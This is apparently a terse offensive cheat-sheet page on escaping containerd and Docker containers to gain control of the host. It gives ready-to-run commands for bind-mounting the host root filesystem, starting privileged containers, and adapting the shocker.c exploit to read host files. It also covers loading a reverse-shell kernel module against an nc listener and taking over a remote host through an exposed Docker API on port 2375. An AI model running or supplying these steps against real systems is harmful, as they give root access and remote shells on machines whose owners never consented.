Containerd Attacks
Last updated
Last updated
ctr image list
Check containerd images
Next Start a container and add it to host machine
ctr run --mount type=bind,src=/,dst=/,options=rbind -t ubuntu:latest ubuntu bash
After that point you can reach root file system.
Start a container in root mode with privileges.
ctr run --privileged --net-host -t ubuntu:latest ubuntu bash
Check capsh --print
And find cap_dac_read_search
mount
Check /etc/hosts is mounted or not
if it is there use the code http://stealth.openwall.net/xSports/shocker.c
Change there main function in order to give argument and read anything in host system.
If there is a way of privs with user rights and taking root by using containers. Create containerd image there and check sys_mod cap and after that reach root file system and heap of process there.
ctr image list
ctr run --privileged --net-host -t ubuntu:latest ubuntu bash
Create that c file
Create Makefile
make
Open another shell and run nc -vnlp 4444
insmod reverse-shell.ko
You have reached the root directories.
Reaching root process heaps with gdb
if there is open docker port in remote machine we can connect to there.
export DOCKER_HOST=REMOTE_HOST_IP:2375
docker run -it -v /:/host ubuntu:22.04 bash
chroot /host
Now we are in remote machine file system.